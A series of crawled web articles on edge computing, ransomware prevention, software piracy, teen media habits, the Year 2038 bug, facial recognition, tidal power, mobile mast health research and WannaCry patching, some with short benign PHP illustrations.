In addition to where the container is located, they’ll want to know which specific items are in each container, what the temperature is in the container, what the humidity or moisture level is (in case anything has gotten wet), and if any of the items have changed position (maybe turned over) since they were placed in the container. Without an edge computing platform, all they know is where the container is at any point in time. They can’t find out the condition of the items until they have arrived, which could cause significant delays for customers if anything needs to be reshipped. Imagine a scenario where sensors are placed in specific places throughout the container – inside, outside, and even on items themselves. These sensors collect data on all the inputs we mentioned and send them back to an edge compute device. The edge compute device then reviews all the data and looks for exceptions. Has the temperature changed a great deal? Has one of the items rotated 180 degrees? Any flagged data will be packaged in the appropriate satellite protocol and sent to the satellite modem, for transmission to the satellite.
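To make the container example concrete, the sketch below shows the kind of exception-filtering logic an edge device could run before anything touches the expensive satellite link. It is only an illustration of the general idea, not ClearBlade platform code; the sensor names, thresholds, container identifier and payload format are all invented for the example.

<?php
// Hypothetical acceptable ranges for one shipping container (illustrative values only).
$limits = [
    'temperature_c' => ['min' => 2.0,  'max' => 8.0],
    'humidity_pct'  => ['min' => 10.0, 'max' => 60.0],
    'tilt_deg'      => ['min' => 0.0,  'max' => 45.0],
];

// Latest readings collected from the local sensors (would normally arrive via a bus or API).
$readings = [
    'temperature_c' => 11.4,
    'humidity_pct'  => 38.0,
    'tilt_deg'      => 2.0,
];

// Keep only the readings that fall outside their allowed range.
$exceptions = [];
foreach ($readings as $sensor => $value) {
    $range = $limits[$sensor];
    if ($value < $range['min'] || $value > $range['max']) {
        $exceptions[$sensor] = $value;
    }
}

// Only exceptions (plus position) are packaged for the low-bandwidth satellite uplink.
if ($exceptions !== []) {
    $payload = json_encode([
        'container_id' => 'C-1042',        // invented identifier
        'position'     => [57.1, -2.1],    // latitude/longitude from GPS
        'exceptions'   => $exceptions,
        'sent_at'      => gmdate('c'),
    ]);
    // send_to_satellite_modem($payload);  // placeholder for whatever modem interface is used
    echo $payload, PHP_EOL;
}

Normal readings never leave the device, which is what keeps satellite airtime and cost to a minimum.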
<urn:uuid:16d801cc-345b-487f-b143-2ecbb664d7eb>
CC-MAIN-2022-40
https://www.clearblade.com/blog/the-edge-of-extraterrestrial-exploration/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335124.77/warc/CC-MAIN-20220928051515-20220928081515-00621.warc.gz
en
0.928809
932
2.953125
3
Ransomware Attacks: How to Prepare, Prevent, and Respond Ransomware attacks are increasing in volume and complexity, and they are mutating in scope. Recently we have seen many highly publicized and disruptive attacks against corporations and government entities. In our work responding to these types of incidents, we have found a direct correlation between the time it takes to respond to a Ransomware attack and the cost associated with recovering from one. Are you prepared to respond quickly to one of these attacks? Ransomware is an immediate threat to the continued operation of an organizational entity: a bad actor seizes and encrypts a company's data, rendering the data unusable by the company until a ransom has been paid or another action has been performed as demanded by the perpetrator. The Department of Homeland Security (DHS) has issued a warning about the increasing frequency of these attacks and a more diverse group of targets ranging from individuals to small businesses to large organizations and government entities. Ransomware attacks typically occur in two forms:
- The bad actor demands a ransom in return for decrypting or returning your data.
- The bad actor demands a ransom in return for not releasing your confidential data to the public.
Ransomware exploits the path of least resistance and relies on taking advantage of individuals within an organization to perform certain actions like clicking on a link, opening up an email attachment, or adding a rogue program, or on an exposure resulting from maintenance actions, such as patching or upgrades, not being performed. While some organizations have robust Incident Response programs that address Ransomware and are better prepared to recover and sustain business operations, many companies do not. A documented and thorough Incident Response program covering Ransomware helps organizations respond and rebound quickly from these events. In fact, many organizations we see are preparing specific plans which focus exclusively on ransomware response. A well-documented plan should cover how to prepare for, prevent, respond to and recover from these events. A comprehensive plan can also serve as the foundation for building Business Continuity and Disaster Recovery (BCDR) programs. Organizations should focus on having a program in place, and vendors selected with contracts in place, before a ransomware event occurs. Some common defenses to prevent or mitigate Ransomware incidents include:
- Mitigate social engineering. Develop social engineering awareness.
- Patch software and operating systems frequently.
- Harden system configurations and security settings.
- Use Multi-Factor Authentication and strong passwords for any internet-facing authentication.
- Recognize rogue URLs by naming structure or spelling errors.
- Use least permissive permissions. Systems should be configured to "Deny ALL or Protect ALL".
- Implement Anti-Phishing Measures (e.g., spam filters).
- Get Cyber Security Insurance (note what is being covered).
- Test backups and data restoration processes before you actually need them (a small automated check along these lines is sketched after this list).
- Implement good endpoint protection (AV software).
- Implement Data Loss Prevention Controls.
- Implement Whitelisting of programs vs. Blacklisting.
- Perform an annual risk assessment, or more frequently, depending on change in environment or actual incident occurrence.
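Several of the items above, backup testing in particular, lend themselves to simple automation. The sketch below is a generic illustration of that idea rather than a CompliancePoint tool; the file paths, the hash manifest and the freshness window are assumptions made purely for the example.

<?php
// Illustrative backup check: confirm that last night's backup exists, is recent,
// and still matches the SHA-256 digest recorded when it was created.
$backupFile   = '/backups/nightly/latest.tar.gz';   // hypothetical path
$manifestFile = '/backups/nightly/latest.sha256';   // digest written at backup time
$maxAgeHours  = 26;                                 // alert if older than roughly a day

$problems = [];

if (!is_file($backupFile)) {
    $problems[] = 'backup file is missing';
} else {
    if (time() - filemtime($backupFile) > $maxAgeHours * 3600) {
        $problems[] = 'backup file is older than expected';
    }
    $expected = is_file($manifestFile) ? trim((string) file_get_contents($manifestFile)) : '';
    if ($expected === '' || !hash_equals($expected, hash_file('sha256', $backupFile))) {
        $problems[] = 'backup checksum does not match the recorded value';
    }
}

if ($problems !== []) {
    // In practice this would raise a ticket or page the on-call engineer.
    fwrite(STDERR, 'Backup verification failed: ' . implode('; ', $problems) . PHP_EOL);
    exit(1);
}

echo 'Backup verification passed', PHP_EOL;

A check like this does not replace periodically restoring a backup end to end, but it catches the most common silent failures between full restore tests.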
The best protection against Ransomware is preventing it from occurring in the first place by utilizing the incident prevention measures covered above. If you become the victim of a successful Ransomware attack, the options are more limited and require some difficult decisions, but recovery is still achievable. CompliancePoint is frequently involved in helping our customers respond to Ransomware incidents, and we have staff standing by. If you have questions or need assistance, please email us at [email protected]. Finding a credible expert with the appropriate background, expertise, and credentials can be difficult. CompliancePoint is here to help.
<urn:uuid:3c14f195-d2b3-45da-8a4f-e315573c0880>
CC-MAIN-2022-40
https://www.compliancepoint.com/cyber-security/ransomware-attacks-how-to-prepare-prevent-and-respond/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00621.warc.gz
en
0.932844
761
2.6875
3
The pandemic caused by COVID-19 has a destructive reach that goes beyond that of a highly contagious and deadly illness. It is also contributing to the rapid spread of piracy — as in spreading illegal copies of commercial software. Software piracy involves much more than businesses and consumers using illegal copies of computer programs. What lurks within the pirated copies is often rogue code — malware — that can be just as deadly to computers and users' finances. Software companies are reporting that piracy has increased 20 to 30 percent due to COVID-19 and working from home, according to Ted Miracco, CEO of compliance and licensing management firm Cylynt. According to research from The Software Alliance (BSA), "nearly 40 percent of all software used worldwide is not properly licensed and software companies are losing nearly US$46 billion a year due to unlicensed use," he told the E-Commerce Times. More specifically, pirated software has a five-pronged consequence that its victims discover only when caught or infected, noted Miracco: 1. Remote work environments are creating a situation where hackers can breach an online fortress to seize a company's intellectual property. 2. Unemployed workers are buying pirated software over the Internet to generate income. 3. WFH employees are making illegal copies of the software they need for their jobs. 4. The ubiquity of the Internet and the wholesale move to cloud computing are not as secure as they could be. 5. Software pirates and hackers are resourceful at hiding their identities and evading anti-piracy technologies. The practice of pirating software — illegally using and distributing someone else's software — has existed since the advent of commercial software. In most cases, pirating software involves the intentional bypass of software security controls, like licenses and entitlements, meant to prevent unauthorized use, according to Paul Dant, vice president for product management of security at Digital.ai. Dant is a reformed child hacker and former software pirate. Software piracy is so widespread that it exists in homes, schools, businesses, and government offices. Software piracy is practiced by individual PC users as well as computer professionals dealing wholesale in stolen applications, according to BSA. The Software Alliance, headquartered in Washington, D.C., with operations in more than 30 countries, is an international organization representing the leading software developers and a foremost advocate for the global software industry before governments and in the international marketplace. It generally issues a Global Software Report every two years. The last such report was published in 2018. That report found the use of unlicensed software, while down slightly over the previous two years, was still widespread. Unlicensed software is still used around the globe at alarming rates, accounting for 37 percent of software installed on personal computers — only a two percent drop from 2016. CIOs reported unlicensed software was increasingly risky and expensive. Malware from unlicensed software cost companies worldwide nearly $359 billion a year. CIOs disclosed that avoiding data hacks and other security threats from malware was the number one reason for ensuring their networks were fully licensed. "Software piracy and cyberattacks continue to escalate, and so far the government has done little to protect its own programs, let alone the private sector," Miracco said.
"Software companies need to take action and arm themselves with the best technological antipiracy solutions available to remain competitive and protect their assets." Software Piracy Hotspots China, whose industrial output now exceeds that of the U.S., and whose policies encourage the theft of foreign technology and information, remains the world's principal IP infringer. Other leading offenders include India and Russia, according to Miracco. Revenera (formerly Flexera Compliance), which according to its website helps companies find and mitigate security and license compliance issues, has published a ranking of the world's top 20 license misuse and piracy hot spots. Some compliance companies specialize in helping enterprise software users voluntarily comply with commercial software licensing requirements. Other firms seek out illegal software users. BSA and other organizations in recent years took uncooperative offenders to court to pay up. Globally, 37 percent of business users are not paying for software, making it a $46.3 billion problem. But eighty-three percent of these unlicensed users in mature markets are legally-inclined victims of software piracy who will pay for software, according to Revenera. The company also claims that the commercial value of unlicensed software in North America and Western Europe was $19 billion. The rest of the world totaled $27.3 billion last year. What Drives Piracy? The number one reason for software piracy is the cost of software licenses, according to Cylynt's Miracco, followed by not seeing a reason to pay for something that is available free or at a cheaper price. "In developing countries such as China, where the time and cost of developing high technology software from scratch is a barrier to leapfrogging the technology gap, the government encourages the theft of software," he said. "This is done to reach its goal of Made in China 2025 to make China the global leader in high-tech manufacturing by 2025." In addition to deliberate software piracy, significant revenue is lost by software companies through unintentional misuse of licenses. Especially in today's WFH environment, employees are sharing licenses and/or downloading cheaper, illegal software not provided by their employers on their home computers, Miracco noted. Consider this scenario as a check of your own potentially illegitimate software use, suggested a Cylynt representative. It helps to understand the path software users follow — sometimes unknowingly — to piracy. You download software to help with a project. Did the software come from the company or a certified partner? Or did it come from what seemed like a legitimate free download site? If this is the case, did the original software manufacturer put its software on the site or give permission for it to be freely downloaded? If not, you could be in violation of the software owner's copyright. Or worse. It could be an unlicensed, pirated copy of the software full of malware about to set off a chain reaction within your company's IT network. Part of the Problem or Hapless Victim? Given the above example, are software "borrowers" complicit or innocent of piracy? Software users caught in the above situation become both, in Miracco's view. Deliberate pirates, especially hackers from China, are encouraged by the government to steal software.
In other cases, smaller companies that cannot afford to pay for expensive software buy illegal copies and provide them to their employees, who use whatever tools they are given in order to do their jobs, he reasoned. “Sometimes, the use could be inadvertent. A WFH employee desperately needs a vital software tool and pulls it off the web without realizing it is a hacked or illegal copy,” he said. The Piracy Scheme Software attackers reverse engineer the target software. They identify the areas of code that handle the security controls. Then they simply modify that code to bypass or disable them, according to Digital.ai’s Dant. “In other words, if I have your software, I can understand how it works and modify it to run completely under my control to include communication with your backend application servers. Without the appropriate protection in place, these attacks are trivial to carry out for an experienced software pirate,” he told the E-Commerce Times. Remember Dant’s background as a reformed child hacker and former software pirate. He says this with great authority. “We continue to struggle with software piracy today because the same inherent software exposures I utilized in the 80s and 90s still exist in plain sight,” he asserted. “Particularly in the age of mobile apps and IoT devices, the stakes go well beyond financial loss due to software piracy. If an application is compromised, we are now contending with everything from massive data exfiltration to degraded operations in healthcare facilities to threats against our privacy, safety, and health,” he said. Is Piracy a Problem Without a Workable Solution? Absolutely not, retorts Miracco. Software developers who have adopted antipiracy and license compliance software and have built robust programs are satisfied with the results. Some companies have opted to develop their own in-house programs. However, most have found that partnering with a company that specializes in antipiracy technology is less resource intensive and yields more, and higher quality, results. “Some piracy will always exist, of course. For companies using antipiracy technology, the losses have declined sharply,” he said. Dant has a different approach to solving the problem. Software makers must make their software more difficult to reverse engineer. They need to enable their software to detect tampering and prevent further execution in a tampered state. “While rarely mentioned in media coverage, it is those distinct exposures that provide an attacker with an initial advantage for researching and formulating attacks surreptitiously and anonymously. But, keep in mind that developers are not meant to address these concerns,” he added. There’s no coding trickery to fix this, Dant cautions. Protection against this type of attack relies upon establishing continuous integration and delivery pipelines that instrument protection before release, transparent to developers, and without any disruption to release flows. An Apt Solution Nothing is ever completely secured, especially software, Dant offered. But if software companies focus on software protection that frustrates and deters the types of attacks that enable piracy (and beyond), that effort can effectively eliminate a substantial subset of potential attackers due to their lack of necessary technical skills and motivation. Hackers’ and pirates’ motivations vary wildly. But they are often financial in nature. 
The better protected your software, the more likely an attacker will choose to move on and find a less protected application that requires fewer resources to attack, Dant suggested. “Severely diminishing the attacker’s return on investment is an effective risk mitigation strategy that can reduce the occurrence of piracy and other attacks against your software,” he concluded.
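Dant's point about tamper detection can be illustrated with a very small integrity self-check. The sketch below is a generic illustration, not Digital.ai's product or any vendor's actual protection scheme; the idea of shipping an expected hash in a separate file is an assumption made for the example, and a real solution would sign and obfuscate this check so that it cannot simply be edited out.

<?php
// Illustrative tamper check: compare this script's own hash with an expected value
// produced at build time and distributed separately (e.g. in a signed manifest).
$expectedFile = __DIR__ . '/expected.sha256';   // hypothetical build artifact

$raw      = is_file($expectedFile) ? file_get_contents($expectedFile) : false;
$expected = $raw === false ? '' : trim($raw);
$actual   = hash_file('sha256', __FILE__);

if ($expected === '' || !hash_equals($expected, $actual)) {
    // Refuse to keep running in a tampered (or unverifiable) state.
    fwrite(STDERR, 'Integrity check failed - refusing to run.' . PHP_EOL);
    exit(1);
}

echo 'Integrity check passed, continuing normal startup.', PHP_EOL;

On its own, a check like this only raises the bar slightly, since an attacker who can edit the program can also edit the check; commercial protections layer obfuscation, code signing and server-side verification on top of the same basic idea.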
<urn:uuid:971a6e2a-6de0-4578-895a-4a87f679406f>
CC-MAIN-2022-40
https://www.crmbuyer.com/story/software-piracy-spreading-with-the-virus-86826.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00621.warc.gz
en
0.944974
2,129
2.90625
3
Although teens and tweens have more choices than ever when it comes to media activities, watching television and listening to music are their top preferences, according to a report Common Sense Media released this week. Among tweens, ages 8 to 12, watching TV was the top media activity, with nearly 62 percent saying they did it every day. For teens, ages 13 to 18, listening to music was the top media activity, with 66 percent of them saying they listened to music every day. The teenagers surveyed spent an average of nearly nine hours a day with entertainment media. Tweens averaged a little more than half that (5:55) on a daily basis. That included watching TV, movies and online videos; playing video, computer and mobile games; using social media; reading; and listening to music. Less Time With Social Screen time also varied between the teens and tweens. About a third of the study's teen participants (31 percent) spent four to eight hours with screen media. Another 26 percent spent more than eight hours glued to a screen. By contrast, 27 percent of tweens spent four to eight hours before a screen, and 11 percent reported spending more than eight hours. While social media has become ingrained in the life of teens — the survey participants spent an average of one hour and 11 minutes on it — it seems they spend less time with it than they do with other activities. Forty-five percent of teens used social media every day, which is less than those listening to music (66 percent) or watching TV (58 percent) every day, according to the report. Moreover, only 36 percent of teens said they liked social media a lot, compared with 73 percent who felt that way about music, and 45 percent who liked TV a lot. No Social Reprise By its nature, social media doesn't consume time like other media forms, noted Jan Dawson, chief analyst with Jackdaw Research. "Once you've consumed social media for the day, you don't keep going back, because there's not that much that's new. With TV and music, you can always find something new to watch on Netflix or television, and you can listen to new music every minute for the rest of your life," he told TechNewsWorld. "Social networking can provide a certain amount of content and connection with friends, but it's not the kind of thing you can spend hours consuming the way you can TV or music," Dawson continued. "That's why Facebook is developing a videos tab and doing more with instant articles," he explained. "They want to recommend stuff to you that your friends haven't shared because that's the only way to increase time spent on the service." There's a growing equality gap in the ownership of computers, tablets and smartphones, the researchers found. Only 54 percent of households with incomes of less than US$35,000 a year had a laptop, for example, compared with 92 percent in households with incomes of $100,000 or more. The same is true for smartphone ownership. Only 51 percent of teens in low-income households owned a smartphone, compared with 78 percent in higher-income households. The divide between kids who can afford smartphones and those who can't is a growing concern among educators. "I've heard educators in low-income communities talking about it," said Alan Simpson, director of policy and communications at the Internet Keep Safe Coalition. "Most of their students have phones, but a lot of their students don't have smartphones," he told TechNewsWorld.
"That matters if they want to introduce one-to-one blended learning and bring-your-own-device approaches, which are a great way to make sure every student in the classroom can access the online learning tools you want to use," Simpson continued. "If half the students have phones that don't go online, then they're not getting the access that the other kids are getting." Teens also have a benign view of how multitasking affects their homework. Half or more of the teen survey participants often or sometimes watched TV (51 percent), used social media (50 percent), engaged in texting (60 percent) or listened to music (76 percent) while doing their homework, they told researchers. Many teens didn't feel those activities affected their homework for better or worse. Nearly two-thirds said watching TV (63 percent) or texting (64 percent) had no impact on their homework. They expressed similar feelings about social media (55 percent) and listening to music (44 percent). In fact, half of teens polled thought listening to music helped more than hurt their homework. Students may be deluding themselves, though, if they think media activity doesn't affect their homework. "Multitasking" inaccurately describes what humans do when they juggle tasks, according to Timothy A. Pychyl, director of the Procrastination Research Group at Carleton University. "We don't multitask; we task switch, and it interrupts our learning process," he told TechNewsWorld. "Homework that was very simple probably wouldn't be affected, but anything that requires higher-order thinking skills, like synthesis or analysis, will suffer," Pychyl said. "You can multitask when tasks are very simple or at least partly automatic for you," he added. "As soon as your brain has to do novel things that involve much more processing and sustained attention, multitasking will undermine performance." There are stark differences in media preferences between the sexes, according to Common Sense. Teen girls liked listening to music (37 percent) more than boys (22 percent), as well as reading (14 to 5 percent) and participating in social media (14 to 5 percent). For video games, though, boys overwhelmingly cited them as a favorite media pastime (27 percent) more often than girls (2 percent). Teen boys spent an average of 56 minutes a day playing video games compared with seven minutes for girls, the researchers found. As many media providers are acutely aware, today's youth are getting a daily dose of content through mobile screens, which is borne out by the Common Sense report. Forty-one percent of all screen time for tweens took place on a mobile device. For teens, it was 46 percent. Parents appeared to be more concerned with the content their kids were interacting with than the amount of time they spent before screens, the researchers found. More than half of teens (53 percent) and 72 percent of tweens said their parents had talked to them about how much time they spent in front of a screen. However, 66 percent of teens and 84 percent of tweens said their parents had spoken to them about the content of the media that they used.
<urn:uuid:7395e3fe-8ebf-443a-9e8b-414dc84210a6>
CC-MAIN-2022-40
https://www.ecommercetimes.com/story/for-tech-savvy-teens-and-tweens-tv-and-music-still-rule-82712.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00621.warc.gz
en
0.960855
1,479
2.625
3
Today is the 19th of January, 2013. Which means the 19th of January, 2038 is now exactly 25 years away from us. Why does it matter? Because at 03:14:07 UTC on the 19th of January 2038 we will run into the Year 2038 Problem. Many Unix-based systems can't handle dates beyond that moment. For example, common Unix-based phones today won't let you set the date beyond 2038. This applies to all the iPhones and Androids we tried it on (iOS is based on BSD and Android is Linux). Obviously this does not apply to Windows Phones, which let you set the date all the way to the year 3000. Yes, 25 years is a long time. But Unix-based systems will definitely still be in use at that time. And some things can start failing way before 2038. For example, if your Unix-based system calculates 25-year interest today, it had better not be using a 32-bit time_t for the calculations.
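The arithmetic behind that date is easy to check. The following snippet is just an illustration of the limit (any language with Unix timestamps would do): 03:14:07 UTC on 19 January 2038 is the largest value a signed 32-bit time_t can hold, and a 25-year offset computed from the current time already lands beyond it.

<?php
// The largest value a signed 32-bit time_t can represent: 2^31 - 1 seconds
// after the Unix epoch (1970-01-01 00:00:00 UTC).
$max32 = 2147483647;
echo gmdate('Y-m-d H:i:s', $max32), " UTC\n";   // prints 2038-01-19 03:14:07 UTC

// A 25-year calculation started now already crosses the limit
// (the offset is rough: it ignores leap days).
$maturity = time() + 25 * 365 * 24 * 60 * 60;

if ($maturity > $max32) {
    echo "A 25-year maturity date no longer fits in a 32-bit time_t\n";
}

On a 64-bit build the arithmetic above merely demonstrates the overflow; on systems where time_t (or the language's integer type) is still 32 bits, dates past that moment cannot be represented at all.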
<urn:uuid:9b3a9bb9-d473-452e-9177-0062a2b59c8b>
CC-MAIN-2022-40
https://archive.f-secure.com/weblog/archives/00002489.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00021.warc.gz
en
0.948031
205
3.4375
3
Artificial intelligence has long been watching our online and data selves. Now, it's watching us in the physical world too. Facial recognition technology has given eyes to AI, allowing it to 'see' and analyse us in the flesh. This ability has met obvious reservations. Indeed, concerns abound that we are heading for an Orwellian dystopia. Big Brother could soon exist in the form of AI — monitoring our actions both on and offline. But facial recognition tech is also beginning to prove useful for businesses. It holds the potential for better safety, security and personalisation. So, what does the future hold for the fledgling AI branch? Howard Williams from Parker Software investigates. The state of facial recognition Facial recognition is one of the biggest buzzwords of the decade. Facial recognition AI uses machine learning to allow computers to recognise and verify human faces. As AI and image recognition advance, so too does the accuracy of facial recognition. Some claim that facial recognition technology is already more accurate than most might expect. In fact, it's achieved scores of 98.52 per cent accuracy in one study. However, this is dependent on specific criteria, such as clear images of a single person. In crowds, accuracy drops significantly. There are also reports of issues with AI identifying people of colour. Not to mention how easy it is to fool. Indeed, it's much easier to find reports of facial recognition AI with 98 per cent inaccurate results. And this is a cause for some concern. Heading for a dystopia Beyond the natural change aversion that tends to accompany new technology, facial recognition feeds more serious concerns. This is down to the fact that its use is already growing in law enforcement and surveillance. Despite, that is, its accuracy issues. The concerns and fears around the current state of facial recognition AI boil down to ethical issues. Namely, the apparent loss of privacy brought by use of the tech. (Particularly in the case of surveillance.) The issue is, for facial recognition AI to work, it needs images of faces to compare and learn from. In some cases, this might be as simple as temporarily storing images of your face as you enter certain places. For example, if the AI needs to confirm two images are of the same person. Already, then, you could have cameras and computers 'watching' your movements throughout the day. However, for it to then identify you, it needs access to stored data about you. So, there's some personal information required. The result is a scary public introduction to facial recognition AI. It's generating the fear that Big Brother AI will soon be watching our every move. Other ethical concerns Privacy isn't the only concern that has people worried about facial recognition AI. There are also issues surrounding the training of the system, and the potential outcomes of relying too much on the technology. For example, there's an issue with where and how companies collect the training data for the AI. The worry is that many data sets were collected without explicit permission from the individuals involved. Some cases have allegedly seen face data scraped from photo apps, for example. The issue is, many official face data sets don't hold enough data or diversity to teach an AI system. This means without more faces to feed to the AI, you get a poor tool with plenty of bias.
Another concern surrounds the issues of accuracy. Namely, the repercussions of false positives if law enforcement relies too heavily on inaccurate AI. What happens to an innocent person facing accusations due to an AI misidentification? The potential of facial recognition On the flipside of the coin, facial recognition technology could take a different route. Stepping away from the dark side of facial recognition AI use, the future stands to be much brighter. Already, businesses are starting to see the value in facial recognition. In fact, it's a technology that could prove beneficial no matter the industry you're in or what your business offers. It supports security, it's useful in healthcare, and boosts personalisation in retail. As a new technology, the scope of its ability is still growing. Indeed, facial recognition AI could become an extremely versatile tool. Safety, security and personalisation Facial recognition AI could boost the safety of your business. For instance, it provides a potential way to combat theft. The computer system could scan faces as they enter the store, and check against a database of known offenders. Or, the technology could provide a new form of authentication. Keys to your buildings are no longer lost if people unlock the doors with their face, for example. Here, facial recognition AI could recognise the face of someone trying to unlock a building or device. Then, it could check the image against a database of your employees. This would ensure only those authorised can gain entry. But facial recognition doesn't just need to revolve around security. It can also boost your personalisation efforts. You could have a system that recognises customers by face as they walk into your shop. Then, it can pull their data from your CRM to help your employees tailor service to them. Facial recognition AI acceptance So, what needs to happen for people to accept this form of AI use?
- Address privacy concerns Be transparent about the use of facial recognition AI and why you need it. Keep clear how it benefits the consumer. Make sure that you have permission to collect their facial data and make it clear how and when you will delete it.
- Remember it's a tool It's important to remember that (at least for the foreseeable future) facial recognition AI is not infallible. Plus, as with any AI, the output you receive is best taken alongside human understanding. In other words, use it as a tool to inform decisions, not a brain to make them.
Approaching a crossroads We stand now at a crossroads. In one direction, an Orwellian dystopia with no privacy and total surveillance. In the other direction, a reality of increased personalisation and embraced individuality. It's true that the technology could lead to a real Big Brother. But it can also revolutionise our businesses. It could improve security and add another layer of personalisation to customer service. Facial recognition AI is a tool. It's no different from other functions of artificial intelligence, or automation, or any other software. And, as with any tool, how we use it is up to us. Howard Williams, customer experience, Parker Software
Image Credit: Sergey Nivens / Shutterstock
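To make the authentication scenario above slightly more concrete, the sketch below shows the matching step most face recognition systems perform: comparing a numeric "embedding" of the captured face against embeddings stored for known people. It is purely illustrative; the names, embedding values and threshold are invented, and producing real embeddings requires a trained face recognition model that is outside the scope of this sketch.

<?php
// Cosine similarity between two face embeddings (vectors of equal length).
function cosineSimilarity(array $a, array $b): float
{
    $dot = 0.0;
    $na  = 0.0;
    $nb  = 0.0;
    foreach ($a as $i => $v) {
        $dot += $v * $b[$i];
        $na  += $v * $v;
        $nb  += $b[$i] * $b[$i];
    }
    return $dot / (sqrt($na) * sqrt($nb));
}

// Hypothetical stored embeddings for enrolled employees (real ones have hundreds of dimensions).
$enrolled = [
    'alice' => [0.12, 0.80, 0.35, 0.44],
    'bob'   => [0.90, 0.10, 0.25, 0.05],
];

// Embedding computed from the camera frame by a face recognition model (invented values).
$probe = [0.11, 0.79, 0.37, 0.40];

$threshold = 0.95;   // tuned per model; higher means fewer false matches
$bestName  = null;
$bestScore = -1.0;

foreach ($enrolled as $name => $embedding) {
    $score = cosineSimilarity($probe, $embedding);
    if ($score > $bestScore) {
        $bestScore = $score;
        $bestName  = $name;
    }
}

echo $bestScore >= $threshold
    ? "Match: $bestName (score $bestScore)\n"
    : "No confident match (best score $bestScore)\n";

The threshold is where the accuracy and bias questions discussed above become practical: set it too low and innocent people are misidentified, set it too high and legitimate users are locked out.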
<urn:uuid:f67b6185-552b-41be-bf6f-1a75d24c7838>
CC-MAIN-2022-40
https://www.itproportal.com/features/big-brother-ai-is-watching-you/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00021.warc.gz
en
0.942424
1,427
2.734375
3
The European Marine Energy Centre (EMEC) has announced the connection of the world's most powerful tidal turbine to the national grid for the first time. Orbital Marine Power's O2 is connected to the mainland via a sub-sea cable that runs from the 2MW offshore unit to the local onshore electricity network. The O2 received 3.4 million pounds in funding from the Scottish Government in 2019. The company, Orbital Marine Power, then used the money to develop a tidal turbine that is capable of powering more than 1,700 homes each year. The O2 is the firm's first commercial turbine; it is 74 metres long and is expected to operate in the waters off Orkney for around 15 years. "Our vision is that this project is the trigger to the harnessing of tidal stream resources around the world to play a role in tackling climate change whilst creating a new, low-carbon industrial sector," Andrew Scott, CEO at Orbital, said. "We believe pioneering our vision in the UK can deliver on a broad spectrum of political initiatives across net-zero, levelling up and building back better at the same time as demonstrating global leadership in the area of low carbon innovation that is essential to creating a more sustainable future for the generations to come." The O2 has the capacity to provide clean and predictable energy to meet the annual demands of around 2,000 British homes. Additionally, the O2 is to provide power to EMEC's onshore electrolyser to generate green hydrogen that will be used to demonstrate decarbonisation of wider energy requirements.
<urn:uuid:a4e06144-ec2c-4561-a2f6-c177596501ba>
CC-MAIN-2022-40
https://digitalinfranetwork.com/news/uk-grid-to-be-connected-with-worlds-most-powerful-tidal-turbine/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00021.warc.gz
en
0.926342
325
2.546875
3
The University of Essex today opened a new laboratory to study the effects of mobile phone masts on human health, including the new 3G masts. The Electromagnetics and Health (EMH) Laboratory will be used to study the impact of electromagnetic fields on health. The project is led by the Department of Psychology at the University and funded by the Mobile Telecommunications and Health Research Programme. Nearly 20,000 people have already been surveyed in Essex to find out what proportion report sensitivity to electromagnetic fields. Participants will be exposed to electromagnetic signals from mobile phone masts, 3G masts, and to no signals at all, and will be asked to note down any symptoms they experience. "Mobile phone technology and usage continues to develop, and it is vital that research into potential health risks keeps pace. Our new laboratory at Essex is equipped to play an important role in understanding the effects of the electromagnetic fields generated by mobile-phone base stations on human health," said Professor Elaine Fox. The research project is set to last two years.
<urn:uuid:569ab255-2517-4a33-9802-03afac40472c>
CC-MAIN-2022-40
https://it-observer.com/study-investigate-3g-health-effects.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00021.warc.gz
en
0.932709
209
2.984375
3
Perhaps the truly surprising aspect of Wannacry is that it did not happen sooner. Exploitation of a security flaw on this scale has long been on the cards and this headline-grabbing piece of ransomware, which affected organisations around the world, has underlined the vulnerability of private and public sector networks. Of course, the way Wannacry worked meant it was particularly effective: the malware reproduced itself like a worm, so it was able to scale rapidly and we will probably continue to see its after-effects for some time. While the initial scare may already be old news, the worry is that organisations are still not protected against similar future threats, which, while they may not be as innovative as Wannacry, could still cause mass devastation. Surely, these organisations have made substantial investments in information security solutions and strategies designed to protect users and data? What about, for example, intrusion detection and prevention systems, multi-AV engines, anti-phishing, application control, deep packet inspection (DPI), URL filtering and APT protection? Why aren't they upgrading to the latest operating systems and patches to protect themselves better? In reality, many organisations have most definitely taken their security responsibilities very seriously, but the traditional approach to security means updating and patching all the systems, applications and devices, which is often just not feasible. The efficacy of existing infosec investments is undermined. Think about it: most professional workers will have access to at least one device, if not several: a desktop system, a laptop, a smartphone, smart-watches and other internet-enabled devices. As the Internet of Things (IoT) continues to grow, the range of end points that need protecting will probably keep on expanding. Extrapolate that across an organisation with hundreds or thousands of employees, plus all the operating systems and applications being run, and it is easy to see how updating and patching becomes such a monumental challenge. There are other complications, in particular the fact that – somewhat ironically – security and compliance requirements forbid modifications, thus preventing updates, therefore contributing to possible vulnerabilities. For instance, in a manufacturing firm, software-driven production equipment is mission-critical. Security reasons often mean that their control systems cannot be modified, which explains why so much legacy equipment is being run on older software versions, even beyond their EOL. That situation is not about to change any time soon, because those IT investments have a shelf-life of many years, even decades. Similarly, in highly regulated markets such as automotive and healthcare, compliance requirements hinder any modifications to existing systems. Beyond those barriers, the sheer cost and effort involved in updates and patching can be prohibitive, so critical security updates may not be implemented immediately, often not for quite a while. Remember the SSL security flaw Heartbleed in 2014? Three years after it was made public, hundreds of thousands of systems connected to the Internet were still unpatched. It is hardly surprising that many organisations follow the 'never change a running system' philosophy, because large-scale updates can lead to errors, performance problems or – worst case scenario – bring the organisation to a halt.
